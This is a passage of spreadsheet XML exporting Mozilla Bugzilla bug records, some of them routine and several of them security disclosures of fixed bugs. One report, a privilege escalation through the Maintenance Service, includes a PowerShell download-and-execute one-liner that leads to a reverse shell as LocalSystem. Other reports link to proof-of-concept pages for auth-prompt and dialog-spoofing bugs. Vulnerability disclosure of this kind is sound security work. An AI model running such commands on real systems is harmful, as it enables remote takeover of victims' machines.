      </c>
      <c r="J3094" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3094" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3094" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3094" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3094" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3094" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3094" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q3094" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3094" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3094" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3094" t="n">
        <v>1</v>
      </c>
      <c r="U3094" t="n">
        <v>0</v>
      </c>
      <c r="V3094" t="n">
        <v>21</v>
      </c>
      <c r="W3094" t="inlineStr">
        <is>
          <t>Michael Jordon of Context IS sent this bug to us, based on testing on a WinXP SP3 machine and Firefox 4.0.1 (I believe, based on the other bug). He writes:</t>
        </is>
      </c>
      <c r="X3094" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3095">
      <c r="A3095" t="n">
        <v>94847</v>
      </c>
      <c r="B3095" t="inlineStr">
        <is>
          <t>2001-08-11 03:28:34 -0700</t>
        </is>
      </c>
      <c r="C3095" t="inlineStr">
        <is>
          <t>Update web site.</t>
        </is>
      </c>
      <c r="D3095" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E3095" t="n">
        <v>1</v>
      </c>
      <c r="F3095" t="n">
        <v>1</v>
      </c>
      <c r="G3095" t="n">
        <v>4</v>
      </c>
      <c r="H3095" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3095" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3095" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3095" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3095" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3095" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3095" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3095" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3095" t="inlineStr">
        <is>
          <t>Verify note: do not verify until 2.14 is released.</t>
        </is>
      </c>
      <c r="Q3095" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3095" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3095" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T3095" t="n">
        <v>1</v>
      </c>
      <c r="U3095" t="n">
        <v>0</v>
      </c>
      <c r="V3095" t="n">
        <v>4</v>
      </c>
      <c r="W3095" t="inlineStr">
        <is>
          <t>Update web site.
I am also the release notes guy as well as QA (currently implies that barnboy
does RN).
Talks about getting CVS before it talks about stable tarballs.  We should be
encouraging the use of stable versions of Bugzilla, so it should be talked about
first.
Add comment to section about reporting a bug asking reporter to be detailed. 
This was in the README - I ripped it out in bug #94846.</t>
        </is>
      </c>
      <c r="X3095" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3096">
      <c r="A3096" t="n">
        <v>1858570</v>
      </c>
      <c r="B3096" t="inlineStr">
        <is>
          <t>2023-10-11 18:06:24 -0700</t>
        </is>
      </c>
      <c r="C3096" t="inlineStr">
        <is>
          <t>inconsistent parsing of relative URLs starting with "///something" with a path-traversal "/../" part</t>
        </is>
      </c>
      <c r="D3096" t="inlineStr">
        <is>
          <t>2024-05-30 11:14:53 -0700</t>
        </is>
      </c>
      <c r="E3096" t="n">
        <v>1</v>
      </c>
      <c r="F3096" t="n">
        <v>1</v>
      </c>
      <c r="G3096" t="n">
        <v>3</v>
      </c>
      <c r="H3096" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3096" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3096" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3096" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3096" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3096" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3096" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3096" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3096" t="inlineStr">
        <is>
          <t>[adv-main120+][adv-esr115.5+][reporter-external] [client-bounty-form] [verif?][necko-triaged][necko-priority-queue]</t>
        </is>
      </c>
      <c r="Q3096" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3096" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3096" t="inlineStr">
        <is>
          <t>120 Branch</t>
        </is>
      </c>
      <c r="T3096" t="n">
        <v>1</v>
      </c>
      <c r="U3096" t="n">
        <v>0</v>
      </c>
      <c r="V3096" t="n">
        <v>21</v>
      </c>
      <c r="W3096" t="inlineStr">
        <is>
          <t>Created attachment 9357973
p0c.html
Mozilla Firefox will ask for confirmation when accessing a url that does not require authentication using the basic auth scheme. By crafting a payload on the href property in the html link attackers can bypass the process of confirmation. 
Step to reproduce : 
1. Install web server 
2. Create html file and save it to your web server path (example of html file is attached)
3. Open html file 
Live demo : http://206.189.194.11/p0c.html
Poc video : https://drive.google.com/file/d/1NXP2MEikvXx0YLybfewHhe16FAXRmbal/view?usp=sharing</t>
        </is>
      </c>
      <c r="X3096" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3097">
      <c r="A3097" t="n">
        <v>1806394</v>
      </c>
      <c r="B3097" t="inlineStr">
        <is>
          <t>2022-12-19 04:29:07 -0800</t>
        </is>
      </c>
      <c r="C3097" t="inlineStr">
        <is>
          <t>Mar File Lock Bypass Leads to Privilege Escalation via Mozilla Maintenance Service</t>
        </is>
      </c>
      <c r="D3097" t="inlineStr">
        <is>
          <t>2024-05-30 11:03:06 -0700</t>
        </is>
      </c>
      <c r="E3097" t="n">
        <v>1</v>
      </c>
      <c r="F3097" t="n">
        <v>1</v>
      </c>
      <c r="G3097" t="n">
        <v>3</v>
      </c>
      <c r="H3097" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3097" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3097" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K3097" t="inlineStr">
        <is>
          <t>Firefox 108</t>
        </is>
      </c>
      <c r="L3097" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3097" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3097" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3097" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3097" t="inlineStr">
        <is>
          <t>enterprisey [post-critsmash-triage][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q3097" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3097" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3097" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T3097" t="n">
        <v>1</v>
      </c>
      <c r="U3097" t="n">
        <v>0</v>
      </c>
      <c r="V3097" t="n">
        <v>31</v>
      </c>
      <c r="W3097" t="inlineStr">
        <is>
          <t>Created attachment 9308915
poc.zip
When updating with the Mozilla Maintenance Service, the update data is loaded via a user-controlled path that points to a mar archive. A signature check is performed, because only mar files from a trusted source should be used. The signature check only works as intended if the content of the mar file does not change, because the mar file is read twice, once for the signature check and once for the actual update. The mar file is only opened once and is write-locked so the mar file content should be static during the process, but this doesn't hold true if the file is read from a malicious SMB server. After the first read of the mar file for the signature verification, a malicious SMB server can provide a completely different mar file for the actual update so that the signature verification can be bypassed. This works at least on Windows 10 Pro, for which I was able to exploit the issue.
## Proof of Concept Exploit
The poc exploits the issue to invoke a reverse shell by the normal Windows user, running in the context of the LocalSystem account.
First the issue is exploited to downgrade `firefox 108.0.1` to a manipulated version of `firefox 47.0`. This version has the content of the `uninstaller\helper.exe` replaced with the content of the `updater.exe` and an addtional `uninstaller\MSASN1.dll` which contains a reverse shell payload. After the downgrade the MozillaMaintenance is used again. During the second update the `helper.exe` is called which loads the `MSASN1.dll` and executes the payload.
I tested the exploit on a fresh install of Windows 10 Pro with Microsoft Defender enabled. Antivirus solutions can interfere with the poc. The poc doesn't work if Microsoft Defender is disabled. The poc expects the mar file to be read twice (probably antivirus check + signature check) before a manipulated mar file will be delivered.
For the malicous SMB server the impacket python module is used.
### Steps to Reproduce:
On computer A which needs docker:
1.) download and extract poc files
2.) build docker container: `sudo docker build -t ffpoc .`
3.) start docker container: `sudo docker run --rm -it --name ffpoc -p 444:444 -p 445:445 -p 8080:8080 ffpoc &lt;ip&gt;`
`&lt;ip&gt;` has to be the reachable from the victim. Wait until the poc setup is completed.
On the victim computer B which has installed `Firefox 108.0.1` to `"C:\Program Files\Mozilla Firefox"` and the MozillaMaintenance Service to `"C:\Program Files (x86)\Mozilla Maintenance Service"` and has SMB enabled:
1.) Open the powershell console as the standard windows user and execute: `IEX (New-Object Net.WebClient).DownloadString('http://&lt;ip&gt;/client.ps1')`. After a few minutes a reverse shell from computer B to computer A will be started. Type `whoami` to check for priviledge escalation to the LocalSystem account.</t>
        </is>
      </c>
      <c r="X3097" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3098">
      <c r="A3098" t="n">
        <v>244273</v>
      </c>
      <c r="B3098" t="inlineStr">
        <is>
          <t>2004-05-21 06:51:50 -0700</t>
        </is>
      </c>
      <c r="C3098" t="inlineStr">
        <is>
          <t>improve current HTTP authentication prompt</t>
        </is>
      </c>
      <c r="D3098" t="inlineStr">
        <is>
          <t>2021-01-12 08:09:06 -0800</t>
        </is>
      </c>
      <c r="E3098" t="n">
        <v>1</v>
      </c>
      <c r="F3098" t="n">
        <v>1</v>
      </c>
      <c r="G3098" t="n">
        <v>6</v>
      </c>
      <c r="H3098" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3098" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3098" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K3098" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3098" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3098" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3098" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3098" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3098" t="inlineStr">
        <is>
          <t>[sg:low spoof] [passwordManager-ui]</t>
        </is>
      </c>
      <c r="Q3098" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3098" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3098" t="inlineStr">
        <is>
          <t>mozilla1.9beta3</t>
        </is>
      </c>
      <c r="T3098" t="n">
        <v>1</v>
      </c>
      <c r="U3098" t="n">
        <v>4</v>
      </c>
      <c r="V3098" t="n">
        <v>68</v>
      </c>
      <c r="W3098" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a) Gecko/20040519 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a) Gecko/20040519 Firefox/0.8
take a look at two enclosed attachments. one whows IE HTTP Auth prompt, one
shows Firefox HTTP Auth prompt.
guess which of these is nicer and more user friendly. 
shouldn't we also have something more nice, when we have IMHO the best browser
artwork on the market?
Reproducible: Always
Steps to Reproduce:
use everything that requires HTTP authentication and see the prompt.
Actual Results:  
the prompt is ugly.
Expected Results:  
the prompt should be much more nice, as the IE's prompt is.</t>
        </is>
      </c>
      <c r="X3098" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3099">
      <c r="A3099" t="n">
        <v>1386597</v>
      </c>
      <c r="B3099" t="inlineStr">
        <is>
          <t>2017-08-02 05:12:49 -0700</t>
        </is>
      </c>
      <c r="C3099" t="inlineStr">
        <is>
          <t>Investigate differences between bsmedberg/daily-latency-metrics, error_aggregates, and quantum_rc</t>
        </is>
      </c>
      <c r="D3099" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E3099" t="n">
        <v>1</v>
      </c>
      <c r="F3099" t="n">
        <v>1</v>
      </c>
      <c r="G3099" t="n">
        <v>2</v>
      </c>
      <c r="H3099" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3099" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J3099" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3099" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3099" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3099" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3099" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3099" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3099" t="inlineStr"/>
      <c r="Q3099" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3099" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3099" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3099" t="n">
        <v>1</v>
      </c>
      <c r="U3099" t="n">
        <v>0</v>
      </c>
      <c r="V3099" t="n">
        <v>4</v>
      </c>
      <c r="W3099" t="inlineStr">
        <is>
          <t>These differences need to be explained, and we need consensus on which values are "correct".</t>
        </is>
      </c>
      <c r="X3099" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3100">
      <c r="A3100" t="n">
        <v>443288</v>
      </c>
      <c r="B3100" t="inlineStr">
        <is>
          <t>2008-07-02 16:47:07 -0700</t>
        </is>
      </c>
      <c r="C3100" t="inlineStr">
        <is>
          <t>Investigate CVE 2008-0016: crash [@ nsACString_internal::SetLength]</t>
        </is>
      </c>
      <c r="D3100" t="inlineStr">
        <is>
          <t>2009-06-09 12:57:19 -0700</t>
        </is>
      </c>
      <c r="E3100" t="n">
        <v>1</v>
      </c>
      <c r="F3100" t="n">
        <v>1</v>
      </c>
      <c r="G3100" t="n">
        <v>3</v>
      </c>
      <c r="H3100" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3100" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3100" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K3100" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3100" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3100" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3100" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3100" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3100" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3100" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3100" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3100" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3100" t="n">
        <v>1</v>
      </c>
      <c r="U3100" t="n">
        <v>0</v>
      </c>
      <c r="V3100" t="n">
        <v>29</v>
      </c>
      <c r="W3100" t="inlineStr">
        <is>
          <t>Created attachment 327885
IBM advisory
Justin Schuh and Tom Cross of the IBM X-Force and Peter Williams of IBM Watson Labs reported this vulnerability to security@m.o.
I have attached the full advisory they provided.  I can confirm that this crashes Firefox 2.0.0.15 but not 3.0.  I will attach a sample backtrace from the crash I'm seeing which for me appears to be a null deref with a small offset.  This differs quite a bit from the advisory notes, so it would be great if we can get some additional eyes looking at this to figure out what's going on.</t>
        </is>
      </c>
      <c r="X3100" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3101">
      <c r="A3101" t="n">
        <v>597070</v>
      </c>
      <c r="B3101" t="inlineStr">
        <is>
          <t>2010-09-16 10:48:51 -0700</t>
        </is>
      </c>
      <c r="C3101" t="inlineStr">
        <is>
          <t>UnicodeEncodeError when saving output of wiki_to_html straight to the database</t>
        </is>
      </c>
      <c r="D3101" t="inlineStr">
        <is>
          <t>2010-11-11 17:59:17 -0800</t>
        </is>
      </c>
      <c r="E3101" t="n">
        <v>1</v>
      </c>
      <c r="F3101" t="n">
        <v>1</v>
      </c>
      <c r="G3101" t="n">
        <v>5</v>
      </c>
      <c r="H3101" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3101" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3101" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3101" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3101" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3101" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3101" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3101" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3101" t="inlineStr"/>
      <c r="Q3101" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3101" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3101" t="inlineStr">
        <is>
          <t>2.3</t>
        </is>
      </c>
      <c r="T3101" t="n">
        <v>1</v>
      </c>
      <c r="U3101" t="n">
        <v>0</v>
      </c>
      <c r="V3101" t="n">
        <v>7</v>
      </c>
      <c r="W3101" t="inlineStr">
        <is>
          <t>Getting this on migrating KB articles (re: bug 586487). Filing after a discussion with James -- it may be occuring on the search branch as well.
Stack trace:
Processing document 3502...
Traceback (most recent call last):
  File "./manage.py", line 49, in &lt;module&gt;
    execute_manager(settings)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/core/management/__init__.py", line 438, in execute_manager
    utility.execute()
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/core/management/__init__.py", line 379, in execute
    self.fetch_command(subcommand).run_from_argv(self.argv)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/core/management/base.py", line 191, in run_from_argv
    self.execute(*args, **options.__dict__)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/core/management/base.py", line 220, in execute
    output = self.handle(*args, **options)
  File "/Users/paulc/Sites/kitsune/apps/wiki/management/commands/migrate_kb.py", line 187, in handle
    document = create_document(tiki_document)
  File "/Users/paulc/Sites/kitsune/apps/wiki/management/commands/migrate_kb.py", line 134, in create_document
    revision = create_revision(td, document, is_approved)
  File "/Users/paulc/Sites/kitsune/apps/wiki/management/commands/migrate_kb.py", line 113, in create_revision
    revision.save()
  File "/Users/paulc/Sites/kitsune/apps/wiki/models.py", line 161, in save
    self.document.save()
  File "/Users/paulc/Sites/kitsune/apps/wiki/models.py", line 103, in save
    super(Document, self).save(*args, **kwargs)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/db/models/base.py", line 434, in save
    self.save_base(using=using, force_insert=force_insert, force_update=force_update)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/db/models/base.py", line 500, in save_base
    rows = manager.using(using).filter(pk=pk_val)._update(values)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/db/models/query.py", line 491, in _update
    return query.get_compiler(self.db).execute_sql(None)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/db/models/sql/compiler.py", line 861, in execute_sql
    cursor = super(SQLUpdateCompiler, self).execute_sql(result_type)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/db/models/sql/compiler.py", line 727, in execute_sql
    cursor.execute(sql, params)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/db/backends/util.py", line 15, in execute
    return self.cursor.execute(sql, params)
  File "/Users/paulc/Sites/kitsune/vendor/src/django/django/db/backends/mysql/base.py", line 86, in execute
    return self.cursor.execute(query, args)
  File "/Users/paulc/.virtualenvs/kitsune/lib/python2.6/site-packages/MySQLdb/cursors.py", line 158, in execute
    query = query % db.literal(args)
  File "/Users/paulc/.virtualenvs/kitsune/lib/python2.6/site-packages/MySQLdb/connections.py", line 265, in literal
    return self.escape(o, self.encoders)
  File "/Users/paulc/.virtualenvs/kitsune/lib/python2.6/site-packages/MySQLdb/connections.py", line 198, in string_literal
    return db.string_literal(obj)
UnicodeEncodeError: 'ascii' codec can't encode characters in position 32-33: ordinal not in range(128)</t>
        </is>
      </c>
      <c r="X3101" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3102">
      <c r="A3102" t="n">
        <v>1744158</v>
      </c>
      <c r="B3102" t="inlineStr">
        <is>
          <t>2021-12-02 15:25:03 -0800</t>
        </is>
      </c>
      <c r="C3102" t="inlineStr">
        <is>
          <t>Security: Background page using iframe can show external protocol dialog in other tabs and without throttling</t>
        </is>
      </c>
      <c r="D3102" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:52 -0700</t>
        </is>
      </c>
      <c r="E3102" t="n">
        <v>1</v>
      </c>
      <c r="F3102" t="n">
        <v>1</v>
      </c>
      <c r="G3102" t="n">
        <v>3</v>
      </c>
      <c r="H3102" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3102" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3102" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3102" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3102" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3102" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3102" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3102" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3102" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-main96+][adv-ESR91.5+]</t>
        </is>
      </c>
      <c r="Q3102" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3102" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3102" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T3102" t="n">
        <v>1</v>
      </c>
      <c r="U3102" t="n">
        <v>0</v>
      </c>
      <c r="V3102" t="n">
        <v>34</v>
      </c>
      <c r="W3102" t="inlineStr">
        <is>
          <t>Created attachment 9253534
spoof-calc-diff-tab.html
This is a standalone bug for Scenario 5 reported in bug 1705211. I didn't previously report separately since I thought this would be fixed in that bug. I assumed that fixing origin display would fix dialog&lt;-&gt;tab association, but seems dialog isn't properly associated with the tab in even with fix when using iframes.
When a background page navigates an iframe to an external protocol URL, the external protocol dialog is shown on the currently focused tab. The dialog will repeatedly be shown on the currently focused tab and any other tab if the user switches tabs.
Firefox behaves as expected when a background page navigates itself (whole tab) to an external protocol URL. This issue only seems to occur when the background page performs the navigation using an iframe.
After the fix for bug 1705211, the dialog shows the correct origin (`https://aogarantiza.com` in this case). However, since there's no throttling or user activation requirement, a user can still feel pressured to proceed with the dialog or potentially think the dialog is mistaken about the origin or that it's coming from the browser itself due to the persistence and cross-tab presence. The dialog will keep re-appearing until the user closes the malicious tab, which could be any other tab.
REPRODUCTION CASE
One way to repro is to use Scenario 5's PoC from bug 1705211:
1. Navigate to https://alesandroortiz.com/security/firefox/external-protocol/spoof-calc-diff-tab.html
2. Click "Continue to Google.com" button
Observed: Dialog initiated by background page is shown in the currently active tab, even if the tab is on a different origin. Dialog will repeatedly be shown on any of the focused tabs.
Expected: Dialog is only shown in tab containing iframe which opened the dialog, along with appropriate throttling.
Another way to repro is to use Scenario 4's PoC from bug 1705211:
1. Navigate to https://alesandroortiz.com/security/firefox/external-protocol/spoof-iframe-src-calc.html
2. Switch to another tab or open a new tab
3. (Optional:) Continue switching tabs and opening new tabs.
Observed: Same as first PoC in this report.
Expected: Same as first PoC in this report.
VERSION
Firefox Version:  94.0.2 Stable (Build ID 20211119140621), also repros in 96.0a1 Nightly (Build ID 20211202094249)
Operating System: Windows_NT 10.0 19042
CREDIT INFORMATION
Reporter credit: Alesandro Ortiz https://AlesandroOrtiz.com</t>
        </is>
      </c>
      <c r="X3102" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3103">
      <c r="A3103" t="n">
        <v>328762</v>
      </c>
      <c r="B3103" t="inlineStr">
        <is>
          <t>2006-02-27 12:07:02 -0800</t>
        </is>
      </c>
      <c r="C3103" t="inlineStr">
        <is>
          <t>Disable all of the old mozilla-* mail&lt;-&gt;news gateways</t>
        </is>
      </c>
      <c r="D3103" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E3103" t="n">
        <v>1</v>
      </c>
      <c r="F3103" t="n">
        <v>1</v>
      </c>
      <c r="G3103" t="n">
        <v>6</v>
      </c>
      <c r="H3103" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3103" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3103" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K3103" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3103" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3103" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3103" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3103" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3103" t="inlineStr"/>
      <c r="Q3103" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3103" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3103" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3103" t="n">
        <v>1</v>
      </c>
      <c r="U3103" t="n">
        <v>0</v>
      </c>
      <c r="V3103" t="n">
        <v>7</v>
      </c>
      <c r="W3103" t="inlineStr">
        <is>
          <t>We've got several mail&lt;-&gt;news gateways still operating on the netscape.public.mozilla.* hierarchy, which need to be shut down as we've officially abandoned that hierarchy.  Our mailman server on that box is stressing at the moment, also, and this will hopefully help cut down on its stress load.
A quick check of the list server shows the following mail gateways still active:
mozilla-beos
mozilla-newsclips
mozilla-browser
mozilla-calendar-checkins
mozilla-checkins
mozilla-crash-data
mozilla-gtk
mozilla-layout-checkins
mozilla-mac
mozilla-macosx
mozilla-mstone
mozilla-patches
mozilla-performance-size-matters
mozilla-platform
mozilla-porkjockeys
mozilla-prefs
mozilla-qt
mozilla-rhapsody
mozilla-rt-messaging
mozilla-unix
mozilla-unix-checkins
mozilla-win32
mozilla-xpfe-checkins
We should start out by posting an email to each list notifying the membership that the list is being shut down.  I have a script on rheet which does this already that we used to mass-notify all the lists of the migration to the other list server a month or so ago.
I don't know if we need to wait after sending that notification before shutting them down.  Opinions?</t>
        </is>
      </c>
      <c r="X3103" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3104">
      <c r="A3104" t="n">
        <v>48177</v>
      </c>
      <c r="B3104" t="inlineStr">
        <is>
          <t>2000-08-09 03:24:06 -0700</t>
        </is>
      </c>
      <c r="C3104" t="inlineStr">
        <is>
          <t>Stop new bugs notification spam for bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="D3104" t="inlineStr">
        <is>
          <t>2011-06-26 22:59:39 -0700</t>
        </is>
      </c>
      <c r="E3104" t="n">
        <v>1</v>
      </c>
      <c r="F3104" t="n">
        <v>1</v>
      </c>
      <c r="G3104" t="n">
        <v>7</v>
      </c>
      <c r="H3104" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3104" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J3104" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3104" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3104" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3104" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
